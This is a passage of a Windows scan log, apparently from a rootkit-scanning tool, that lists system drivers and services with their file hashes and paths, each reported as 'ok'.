01:19:23.0751 5804 [ D4DF28447741FD3D953526E33A617397 ] blbdrive C:\Windows\system32\drivers\blbdrive.sys
01:19:23.0798 5804 blbdrive - ok
01:19:23.0907 5804 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
01:19:23.0939 5804 Bonjour Service - ok
01:19:24.0017 5804 [ 8153396D5551276227FA146900F734E6 ] bowser C:\Windows\system32\DRIVERS\bowser.sys
01:19:24.0048 5804 bowser - ok
01:19:24.0079 5804 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
01:19:24.0126 5804 BrFiltLo - ok
01:19:24.0126 5804 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
01:19:24.0219 5804 BrFiltUp - ok
01:19:24.0251 5804 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
01:19:24.0297 5804 Browser - ok
01:19:24.0313 5804 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
01:19:24.0500 5804 Brserid - ok
01:19:24.0531 5804 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
01:19:24.0609 5804 BrSerWdm - ok
01:19:24.0641 5804 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
01:19:24.0719 5804 BrUsbMdm - ok
01:19:24.0765 5804 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
01:19:24.0843 5804 BrUsbSer - ok
01:19:24.0953 5804 [ AE19CFBBBA41800F3D5343E21D2CA09F ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
01:19:24.0999 5804 BthEnum - ok
01:19:25.0046 5804 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
01:19:25.0124 5804 BTHMODEM - ok
01:19:25.0155 5804 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
01:19:25.0202 5804 BthPan - ok
01:19:25.0233 5804 [ 75F19DF0BC62992D05FDD8A32D968531 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
01:19:25.0296 5804 BTHPORT - ok
01:19:25.0374 5804 [ FC930B47A83F5F61DFADC64A0719DE43 ] BthServ C:\Windows\System32\bthserv.dll
01:19:25.0405 5804 BthServ - ok
01:19:25.0421 5804 [ 4CE2A25C5936BC515357D60FEE73F221 ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
01:19:25.0452 5804 BTHUSB - ok
01:19:25.0483 5804 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
01:19:25.0530 5804 cdfs - ok
01:19:25.0561 5804 [ 1EC25CEA0DE6AC4718BF89F9E1778B57 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
01:19:25.0608 5804 cdrom - ok
01:19:25.0655 5804 [ 87C2D0377B23E2D8A41093C2F5FB1A5B ] CertPropSvc C:\Windows\System32\certprop.dll
01:19:25.0701 5804 CertPropSvc - ok
01:19:25.0717 5804 [ E5D4133F37219DBCFE102BC61072589D ] circlass C:\Windows\system32\drivers\circlass.sys
01:19:25.0764 5804 circlass - ok
01:19:25.0779 5804 [ 465745561C832B29F7C48B488AAB3842 ] CLFS C:\Windows\system32\CLFS.sys
01:19:25.0842 5804 CLFS - ok
01:19:25.0982 5804 [ D87ACAED61E417BBA546CED5E7E36D9C ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
01:19:26.0123 5804 clr_optimization_v2.0.50727_32 - ok
01:19:26.0185 5804 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
01:19:26.0247 5804 clr_optimization_v4.0.30319_32 - ok
01:19:26.0294 5804 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
01:19:26.0341 5804 CmBatt - ok
01:19:26.0357 5804 [ 0CA25E686A4928484E9FDABD168AB629 ] cmdide C:\Windows\system32\drivers\cmdide.sys
01:19:26.0388 5804 cmdide - ok
01:19:26.0403 5804 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
01:19:26.0419 5804 Compbatt - ok
01:19:26.0419 5804 COMSysApp - ok
01:19:26.0435 5804 [ 741E9DFF4F42D2D8477D0FC1DC0DF871 ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
01:19:26.0466 5804 crcdisk - ok
01:19:26.0481 5804 [ 1F07BECDCA750766A96CDA811BA86410 ] Crusoe C:\Windows\system32\drivers\crusoe.sys
01:19:26.0528 5804 Crusoe - ok
01:19:26.0575 5804 [ 6DE363F9F99334514C46AEC02D3E3678 ] CryptSvc C:\Windows\system32\cryptsvc.dll
01:19:26.0637 5804 CryptSvc - ok
01:19:26.0871 5804 [ 301AE00E12408650BADDC04DBC832830 ] DcomLaunch C:\Windows\system32\rpcss.dll
01:19:26.0996 5804 DcomLaunch - ok
01:19:27.0059 5804 [ A3E9FA213F443AC77C7746119D13FEEC ] DfsC C:\Windows\system32\Drivers\dfsc.sys
01:19:27.0121 5804 DfsC - ok
01:19:27.0246 5804 [ FA3463F25F9CC9C3BCF1E7912FEFF099 ] DFSR C:\Windows\system32\DFSR.exe
01:19:27.0417 5804 DFSR - ok
01:19:27.0511 5804 DgiVecp - ok
01:19:27.0558 5804 [ 43A988A9C10333476CB5FB667CBD629D ] Dhcp C:\Windows\System32\dhcpcsvc.dll
01:19:27.0620 5804 Dhcp - ok
01:19:27.0636 5804 [ 64109E623ABD6955C8FB110B592E68B7 ] disk C:\Windows\system32\drivers\disk.sys
01:19:27.0651 5804 disk - ok
01:19:27.0729 5804 [ 4805D9A6D281C7A7DEFD9094DEC6AF7D ] Dnscache C:\Windows\System32\dnsrslvr.dll
01:19:27.0792 5804 Dnscache - ok
01:19:27.0823 5804 [ 5AF620A08C614E24206B79E8153CF1A8 ] dot3svc C:\Windows\System32\dot3svc.dll
01:19:28.0010 5804 dot3svc - ok
01:19:28.0026 5804 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
01:19:28.0088 5804 DPS - ok
01:19:28.0119 5804 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
01:19:28.0151 5804 drmkaud - ok
01:19:28.0229 5804 [ 85F33880B8CFB554BD3D9CCDB486845A ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
01:19:28.0322 5804 DXGKrnl - ok
01:19:28.0416 5804 [ 5425F74AC0C1DBD96A1E04F17D63F94C ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
01:19:28.0463 5804 E1G60 - ok
01:19:28.0494 5804 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
01:19:28.0541 5804 EapHost - ok
01:19:28.0650 5804 [ DD2CD259D83D8B72C02C5F2331FF9D68 ] Ecache C:\Windows\system32\drivers\ecache.sys
01:19:28.0681 5804 Ecache - ok
01:19:28.0790 5804 [ 9BE3744D295A7701EB425332014F0797 ] ehRecvr C:\Windows\ehome\ehRecvr.exe
01:19:28.0868 5804 ehRecvr - ok
01:19:28.0899 5804 [ AD1870C8E5D6DD340C829E6074BF3C3F ] ehSched C:\Windows\ehome\ehsched.exe
01:19:28.0977 5804 ehSched - ok
01:19:29.0009 5804 [ C27C4EE8926E74AA72EFCAB24C5242C3 ] ehstart C:\Windows\ehome\ehstart.dll
01:19:29.0024 5804 ehstart - ok
01:19:29.0118 5804 [ 23B62471681A124889978F6295B3F4C6 ] elxstor C:\Windows\system32\drivers\elxstor.sys
01:19:29.0149 5804 elxstor - ok
01:19:29.0243 5804 [ 70B1A86DF0C8EAD17D2BC332EDAE2C7C ] EMDMgmt C:\Windows\system32\emdmgmt.dll
01:19:29.0336 5804 EMDMgmt - ok
01:19:29.0414 5804 [ 3DB974F3935483555D7148663F726C61 ] ErrDev C:\Windows\system32\drivers\errdev.sys
01:19:29.0461 5804 ErrDev - ok
01:19:29.0555 5804 [ 3CB3343D720168B575133A0A20DC2465 ] EventSystem C:\Windows\system32\es.dll
01:19:29.0617 5804 EventSystem - ok
01:19:29.0664 5804 [ 0D858EB20589A34EFB25695ACAA6AA2D ] exfat C:\Windows\system32\drivers\exfat.sys
01:19:29.0711 5804 exfat - ok
01:19:29.0757 5804 [ 3C489390C2E2064563727752AF8EAB9E ] fastfat C:\Windows\system32\drivers\fastfat.sys
01:19:29.0804 5804 fastfat - ok
01:19:29.0851 5804 [ AFE1E8B9782A0DD7FB46BBD88E43F89A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
01:19:29.0898 5804 fdc - ok
01:19:29.0991 5804 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
01:19:30.0085 5804 fdPHost - ok
01:19:30.0085 5804 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
01:19:30.0194 5804 FDResPub - ok
01:19:30.0210 5804 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
01:19:30.0241 5804 FileInfo - ok
01:19:30.0272 5804 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
01:19:30.0319 5804 Filetrace - ok
01:19:30.0366 5804 [ 85B7CF99D532820495D68D747FDA9EBD ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
01:19:30.0413 5804 flpydisk - ok
01:19:30.0428 5804 [ 05EA53AFE985443011E36DAB07343B46 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
01:19:30.0444 5804 FltMgr - ok
01:19:30.0506 5804 [ C9BE08664611DDAF98E2331E9288B00B ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
01:19:30.0522 5804 FontCache3.0.0.0 - ok
01:19:30.0553 5804 [ 65EA8B77B5851854F0C55C43FA51A198 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
01:19:30.0584 5804 Fs_Rec - ok
01:19:30.0615 5804 [ 34582A6E6573D54A07ECE5FE24A126B5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
01:19:30.0647 5804 gagp30kx - ok
01:19:30.0662 5804 [ 185ADA973B5020655CEE342059A86CBB ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
01:19:30.0693 5804 GEARAspiWDM - ok
01:19:30.0725 5804 [ D9F1113D9401185245573350712F92FC ] gpsvc C:\Windows\System32\gpsvc.dll
01:19:30.0834 5804 gpsvc - ok
01:19:30.0943 5804 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
01:19:31.0021 5804 HdAudAddService - ok
01:19:31.0068 5804 [ C87B1EE051C0464491C1A7B03FA0BC99 ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
01:19:31.0115 5804 HDAudBus - ok
01:19:31.0130 5804 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
01:19:31.0208 5804 HidBth - ok
01:19:31.0239 5804 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
01:19:31.0317 5804 HidIr - ok
01:19:31.0364 5804 [ 53D5A2F9CE6AE47D7507727DF1DA79F8 ] hidserv C:\Windows\system32\hidserv.dll
01:19:31.0427 5804 hidserv - ok
01:19:31.0442 5804 [ 854CA287AB7FAF949617A788306D967E ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
01:19:31.0489 5804 HidUsb - ok
01:19:31.0520 5804 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
01:19:31.0614 5804 hkmsvc - ok
01:19:31.0629 5804 [ 16EE7B23A009E00D835CDB79574A91A6 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
01:19:31.0645 5804 HpCISSs - ok
01:19:31.0692 5804 [ 96E241624C71211A79C84F50A8E71CAB ] HTTP C:\Windows\system32\drivers\HTTP.sys
01:19:31.0723 5804 HTTP - ok
01:19:31.0785 5804 [ C6B032D69650985468160FC9937CF5B4 ] i2omp C:\Windows\system32\drivers\i2omp.sys
01:19:31.0801 5804 i2omp - ok
01:19:31.0848 5804 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
01:19:31.0895 5804 i8042prt - ok
01:19:31.0926 5804 [ 54155EA1B0DF185878E0FC9EC3AC3A14 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
01:19:32.0036 5804 iaStorV - ok
01:19:32.0098 5804 [ 7B630ACAED64FEF0C3E1CF255CB56686 ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
01:19:32.0239 5804 idsvc - ok
01:19:32.0254 5804 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
01:19:32.0286 5804 iirsp - ok
01:19:32.0317 5804 [ A3BC480A2BF8AA8E4DABD2D5DCE0AFAC ] IKEEXT C:\Windows\System32\ikeext.dll
01:19:32.0410 5804 IKEEXT - ok
01:19:32.0598 5804 [ D9B869A909CC93AEC507D4F7DFA24434 ] IntcAzAudAddService C:\Windows\system32\drivers\RTKVHDA.sys
01:19:32.0769 5804 IntcAzAudAddService - ok
01:19:32.0894 5804 [ 83AA759F3189E6370C30DE5DC5590718 ] intelide C:\Windows\system32\drivers\intelide.sys
01:19:32.0925 5804 intelide - ok
01:19:32.0956 5804 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
01:19:32.0988 5804 intelppm - ok
01:19:33.0034 5804 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
01:19:33.0144 5804 IPBusEnum - ok
01:19:33.0159 5804 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
01:19:33.0206 5804 IpFilterDriver - ok
01:19:33.0284 5804 [ 6A35D233693EDC29A12742049BC5E37F ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
01:19:33.0378 5804 iphlpsvc - ok
01:19:33.0378 5804 IpInIp - ok
01:19:33.0440 5804 [ B25AAF203552B7B3491139D582B39AD1 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
01:19:33.0502 5804 IPMIDRV - ok
01:19:33.0549 5804 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
01:19:33.0596 5804 IPNAT - ok
01:19:33.0643 5804 [ E8A39D41474BE42FD8830CED32932D6C ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
01:19:33.0674 5804 iPod Service - ok
01:19:33.0736 5804 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
01:19:33.0783 5804 IRENUM - ok
01:19:33.0814 5804 [ 6C70698A3E5C4376C6AB5C7C17FB0614 ] isapnp C:\Windows\system32\drivers\isapnp.sys
01:19:33.0830 5804 isapnp - ok
01:19:33.0846 5804 [ F247EEC28317F6C739C16DE420097301 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
01:19:33.0877 5804 iScsiPrt - ok
01:19:33.0892 5804 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
01:19:33.0924 5804 iteatapi - ok
01:19:33.0955 5804 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
01:19:33.0955 5804 iteraid - ok
01:19:33.0986 5804 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
01:19:34.0017 5804 kbdclass - ok
01:19:34.0048 5804 [ 18247836959BA67E3511B62846B9C2E0 ] kbdhid C:\Windows\system32\drivers\kbdhid.sys
01:19:34.0080 5804 kbdhid - ok
01:19:34.0158 5804 [ 27BD4AC228EF6C0D490617C32E86A672 ] kbfiltr C:\Windows\system32\DRIVERS\kbfiltr.sys
01:19:34.0173 5804 kbfiltr - ok
01:19:34.0236 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] KeyIso C:\Windows\system32\lsass.exe
01:19:34.0329 5804 KeyIso - ok
01:19:34.0360 5804 [ 7A0CF7908B6824D6A2A1D313E5AE3DCA ] KSecDD C:\Windows\system32\Drivers\ksecdd.sys
01:19:34.0392 5804 KSecDD - ok
01:19:34.0501 5804 [ 8078F8F8F7A79E2E6B494523A828C585 ] KtmRm C:\Windows\system32\msdtckrm.dll
01:19:34.0579 5804 KtmRm - ok
01:19:34.0610 5804 [ 1925E63C91CF1610AE41BFD539062079 ] LanmanServer C:\Windows\system32\srvsvc.dll
01:19:34.0719 5804 LanmanServer - ok
01:19:34.0797 5804 [ 2AE2E1628C5D3F1C0A46A67C9FA1DF15 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
01:19:34.0906 5804 LanmanWorkstation - ok
01:19:34.0938 5804 [ D1C5883087A0C3F1344D9D55A44901F6 ] lltdio C:\Windows\system32\DRIVERS\lltdio.sys
01:19:34.0984 5804 lltdio - ok
01:19:35.0078 5804 [ 2D5A428872F1442631D0959A34ABFF63 ] lltdsvc C:\Windows\System32\lltdsvc.dll
01:19:35.0156 5804 lltdsvc - ok
01:19:35.0187 5804 [ 35D40113E4A5B961B6CE5C5857702518 ] lmhosts C:\Windows\System32\lmhsvc.dll
01:19:35.0281 5804 lmhosts - ok
01:19:35.0343 5804 [ C7E15E82879BF3235B559563D4185365 ] LSI_FC C:\Windows\system32\drivers\lsi_fc.sys
01:19:35.0359 5804 LSI_FC - ok
01:19:35.0406 5804 [ EE01EBAE8C9BF0FA072E0FF68718920A ] LSI_SAS C:\Windows\system32\drivers\lsi_sas.sys
01:19:35.0421 5804 LSI_SAS - ok
01:19:35.0452 5804 [ 912A04696E9CA30146A62AFA1463DD5C ] LSI_SCSI C:\Windows\system32\drivers\lsi_scsi.sys
01:19:35.0484 5804 LSI_SCSI - ok
01:19:35.0499 5804 [ 8F5C7426567798E62A3B3614965D62CC ] luafv C:\Windows\system32\drivers\luafv.sys
01:19:35.0530 5804 luafv - ok
01:19:35.0593 5804 [ 8039F480C192DD99FED4EBC71FFBF795 ] lullaby C:\Windows\system32\DRIVERS\lullaby.sys
01:19:35.0608 5804 lullaby - ok
01:19:35.0671 5804 [ AEF9BABB8A506BC4CE0451A64AADED46 ] Mcx2Svc C:\Windows\system32\Mcx2Svc.dll
01:19:35.0718 5804 Mcx2Svc - ok
01:19:35.0764 5804 [ 0001CE609D66632FA17B84705F658879 ] megasas C:\Windows\system32\drivers\megasas.sys
01:19:35.0780 5804 megasas - ok
01:19:35.0842 5804 [ C252F32CD9A49DBFC25ECF26EBD51A99 ] MegaSR C:\Windows\system32\drivers\megasr.sys
01:19:35.0889 5804 MegaSR - ok
01:19:35.0936 5804 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] MMCSS C:\Windows\system32\mmcss.dll
01:19:36.0014 5804 MMCSS - ok
01:19:36.0061 5804 [ E13B5EA0F51BA5B1512EC671393D09BA ] Modem C:\Windows\system32\drivers\modem.sys
01:19:36.0092 5804 Modem - ok
01:19:36.0108 5804 [ 0A9BB33B56E294F686ABB7C1E4E2D8A8 ] monitor C:\Windows\system32\DRIVERS\monitor.sys
01:19:36.0154 5804 monitor - ok
01:19:36.0170 5804 [ 5BF6A1326A335C5298477754A506D263 ] mouclass C:\Windows\system32\DRIVERS\mouclass.sys
01:19:36.0186 5804 mouclass - ok
01:19:36.0201 5804 [ 93B8D4869E12CFBE663915502900876F ] mouhid C:\Windows\system32\DRIVERS\mouhid.sys
01:19:36.0248 5804 mouhid - ok
01:19:36.0264 5804 [ BDAFC88AA6B92F7842416EA6A48E1600 ] MountMgr C:\Windows\system32\drivers\mountmgr.sys
01:19:36.0279 5804 MountMgr - ok
01:19:36.0357 5804 [ 5C5E45DDABEFBC9F564F1D5C83258B8F ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
01:19:36.0373 5804 MozillaMaintenance - ok
01:19:36.0435 5804 [ 511D011289755DD9F9A7579FB0B064E6 ] mpio C:\Windows\system32\drivers\mpio.sys
01:19:36.0451 5804 mpio - ok
01:19:36.0482 5804 [ 22241FEBA9B2DEFA669C8CB0A8DD7D2E ] mpsdrv C:\Windows\system32\drivers\mpsdrv.sys
01:19:36.0529 5804 mpsdrv - ok
01:19:36.0560 5804 [ D1639BA315B0D79DEC49A4B0E1FB929B ] MpsSvc C:\Windows\system32\mpssvc.dll
01:19:36.0669 5804 MpsSvc - ok
01:19:36.0716 5804 [ 4FBBB70D30FD20EC51F80061703B001E ] Mraid35x C:\Windows\system32\drivers\mraid35x.sys
01:19:36.0747 5804 Mraid35x - ok
01:19:36.0763 5804 [ AE3DE84536B6799D2267443CEC8EDBB9 ] MRxDAV C:\Windows\system32\drivers\mrxdav.sys
01:19:36.0825 5804 MRxDAV - ok
01:19:36.0888 5804 [ 5734A0F2BE7E495F7D3ED6EFD4B9F5A1 ] mrxsmb C:\Windows\system32\DRIVERS\mrxsmb.sys
01:19:36.0997 5804 mrxsmb - ok
01:19:37.0012 5804 [ 6B5FA5ADFACAC9DBBE0991F4566D7D55 ] mrxsmb10 C:\Windows\system32\DRIVERS\mrxsmb10.sys
01:19:37.0059 5804 mrxsmb10 - ok
01:19:37.0059 5804 [ 5C80D8159181C7ABF1B14BA703B01E0B ] mrxsmb20 C:\Windows\system32\DRIVERS\mrxsmb20.sys
01:19:37.0090 5804 mrxsmb20 - ok
01:19:37.0153 5804 [ 28023E86F17001F7CD9B15A5BC9AE07D ] msahci C:\Windows\system32\drivers\msahci.sys
01:19:37.0184 5804 msahci - ok
01:19:37.0215 5804 [ 4468B0F385A86ECDDAF8D3CA662EC0E7 ] msdsm C:\Windows\system32\drivers\msdsm.sys
01:19:37.0246 5804 msdsm - ok
01:19:37.0262 5804 [ FD7520CC3A80C5FC8C48852BB24C6DED ] MSDTC C:\Windows\System32\msdtc.exe
01:19:37.0356 5804 MSDTC - ok
01:19:37.0418 5804 [ A9927F4A46B816C92F461ACB90CF8515 ] Msfs C:\Windows\system32\drivers\Msfs.sys
01:19:37.0449 5804 Msfs - ok
01:19:37.0480 5804 [ 0F400E306F385C56317357D6DEA56F62 ] msisadrv C:\Windows\system32\drivers\msisadrv.sys
01:19:37.0496 5804 msisadrv - ok
01:19:37.0558 5804 [ 85466C0757A23D9A9AECDC0755203CB2 ] MSiSCSI C:\Windows\system32\iscsiexe.dll
01:19:37.0636 5804 MSiSCSI - ok
01:19:37.0636 5804 msiserver - ok
01:19:37.0683 5804 [ D8C63D34D9C9E56C059E24EC7185CC07 ] MSKSSRV C:\Windows\system32\drivers\MSKSSRV.sys
01:19:37.0730 5804 MSKSSRV - ok
01:19:37.0761 5804 [ 1D373C90D62DDB641D50E55B9E78D65E ] MSPCLOCK C:\Windows\system32\drivers\MSPCLOCK.sys
01:19:37.0792 5804 MSPCLOCK - ok
01:19:37.0808 5804 [ B572DA05BF4E098D4BBA3A4734FB505B ] MSPQM C:\Windows\system32\drivers\MSPQM.sys
01:19:37.0855 5804 MSPQM - ok
01:19:37.0886 5804 [ B5614AECB05A9340AA0FB55BF561CC63 ] MsRPC C:\Windows\system32\drivers\MsRPC.sys
01:19:37.0917 5804 MsRPC - ok
01:19:37.0933 5804 [ E384487CB84BE41D09711C30CA79646C ] mssmbios C:\Windows\system32\DRIVERS\mssmbios.sys
01:19:37.0964 5804 mssmbios - ok
01:19:37.0980 5804 [ 7199C1EEC1E4993CAF96B8C0A26BD58A ] MSTEE C:\Windows\system32\drivers\MSTEE.sys
01:19:38.0011 5804 MSTEE - ok
01:19:38.0089 5804 [ 97AFFA9D95FFE20EEE6229BC6BE166CF ] MTsensor C:\Windows\system32\DRIVERS\ATKACPI.sys
01:19:38.0120 5804 MTsensor - ok
01:19:38.0136 5804 [ 6DFD1D322DE55B0B7DB7D21B90BEC49C ] Mup C:\Windows\system32\Drivers\mup.sys
01:19:38.0151 5804 Mup - ok
01:19:38.0198 5804 [ C43B25863FBD65B6D2A142AF3AE320CA ] napagent C:\Windows\system32\qagentRT.dll
01:19:38.0338 5804 napagent - ok
01:19:38.0401 5804 [ 3C21CE48FF529BB73DADB98770B54025 ] NativeWifiP C:\Windows\system32\DRIVERS\nwifi.sys
01:19:38.0448 5804 NativeWifiP - ok
01:19:38.0494 5804 [ 9BDC71790FA08F0A0B5F10462B1BD0B1 ] NDIS C:\Windows\system32\drivers\ndis.sys
01:19:38.0526 5804 NDIS - ok
01:19:38.0604 5804 [ 0E186E90404980569FB449BA7519AE61 ] NdisTapi C:\Windows\system32\DRIVERS\ndistapi.sys
01:19:38.0650 5804 NdisTapi - ok
01:19:38.0650 5804 [ D6973AA34C4D5D76C0430B181C3CD389 ] Ndisuio C:\Windows\system32\DRIVERS\ndisuio.sys
01:19:38.0713 5804 Ndisuio - ok
01:19:38.0744 5804 [ 3D14C3B3496F88890D431E8AA022A411 ] NdisWan C:\Windows\system32\DRIVERS\ndiswan.sys
01:19:38.0806 5804 NdisWan - ok
01:19:38.0853 5804 [ 71DAB552B41936358F3B541AE5997FB3 ] NDProxy C:\Windows\system32\drivers\NDProxy.sys
01:19:38.0978 5804 NDProxy - ok
01:19:39.0009 5804 [ BCD093A5A6777CF626434568DC7DBA78 ] NetBIOS C:\Windows\system32\DRIVERS\netbios.sys
01:19:39.0087 5804 NetBIOS - ok
01:19:39.0118 5804 [ 7C5FEE5B1C5728507CD96FB4A13E7A02 ] netbt C:\Windows\system32\DRIVERS\netbt.sys
01:19:39.0181 5804 netbt - ok
01:19:39.0212 5804 [ A911ECAC81F94ADEAFBE8E3F7873EDB0 ] Netlogon C:\Windows\system32\lsass.exe
01:19:39.0274 5804 Netlogon - ok
01:19:39.0321 5804 [ C8052711DAECC48B982434C5116CA401 ] Netman C:\Windows\System32\netman.dll
01:19:39.0446 5804 Netman - ok
01:19:39.0462 5804 [ 2EF3BBE22E5A5ACD1428EE387A0D0172 ] netprofm C:\Windows\System32\netprofm.dll
01:19:39.0555 5804 netprofm - ok
01:19:39.0618 5804 [ 0AD5876EF4E9EB77C8F93EB5B2FFF386 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
01:19:39.0649 5804 NetTcpPortSharing - ok
01:19:39.0711 5804 [ 2E7FB731D4790A1BC6270ACCEFACB36E ] nfrd960 C:\Windows\system32\drivers\nfrd960.sys
01:19:39.0727 5804 nfrd960 - ok
01:19:39.0758 5804 [ 2997B15415F9BBE05B5A4C1C85E0C6A2 ] NlaSvc C:\Windows\System32\nlasvc.dll
01:19:39.0836 5804 NlaSvc - ok
01:19:39.0852 5804 [ ECB5003F484F9ED6C608D6D6C7886CBB ] Npfs C:\Windows\system32\drivers\Npfs.sys
01:19:39.0898 5804 Npfs - ok
01:19:39.0914 5804 [ 8BB86F0C7EEA2BDED6FE095D0B4CA9BD ] nsi C:\Windows\system32\nsisvc.dll
01:19:39.0992 5804 nsi - ok
01:19:40.0008 5804 [ 609773E344A97410CE4EBF74A8914FCF ] nsiproxy C:\Windows\system32\drivers\nsiproxy.sys
01:19:40.0039 5804 nsiproxy - ok
01:19:40.0117 5804 [ B4EFFE29EB4F15538FD8A9681108492D ] Ntfs C:\Windows\system32\drivers\Ntfs.sys
01:19:40.0164 5804 Ntfs - ok
01:19:40.0242 5804 [ E875C093AEC0C978A90F30C9E0DFBB72 ] ntrigdigi C:\Windows\system32\drivers\ntrigdigi.sys
01:19:40.0304 5804 ntrigdigi - ok
01:19:40.0304 5804 [ C5DBBCDA07D780BDA9B685DF333BB41E ] Null C:\Windows\system32\drivers\Null.sys
01:19:40.0351 5804 Null - ok
01:19:40.0382 5804 [ 2EDF9E7751554B42CBB60116DE727101 ] nvraid C:\Windows\system32\drivers\nvraid.sys
01:19:40.0398 5804 nvraid - ok
01:19:40.0444 5804 [ ABED0C09758D1D97DB0042DBB2688177 ] nvstor C:\Windows\system32\drivers\nvstor.sys
01:19:40.0460 5804 nvstor - ok
01:19:40.0507 5804 [ 18BBDF913916B71BD54575BDB6EEAC0B ] nv_agp C:\Windows\system32\drivers\nv_agp.sys
01:19:40.0522 5804 nv_agp - ok
01:19:40.0522 5804 NwlnkFlt - ok
01:19:40.0538 5804 NwlnkFwd - ok
01:19:40.0585 5804 [ 790E27C3DB53410B40FF9EF2FD10A1D9 ] ohci1394 C:\Windows\system32\DRIVERS\ohci1394.sys
01:19:40.0616 5804 ohci1394 - ok
01:19:40.0694 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] p2pimsvc C:\Windows\system32\p2psvc.dll
01:19:40.0834 5804 p2pimsvc - ok
01:19:40.0897 5804 [ 5DE1A3972FD3112C75EB17BDCF454169 ] p2psvc C:\Windows\system32\p2psvc.dll
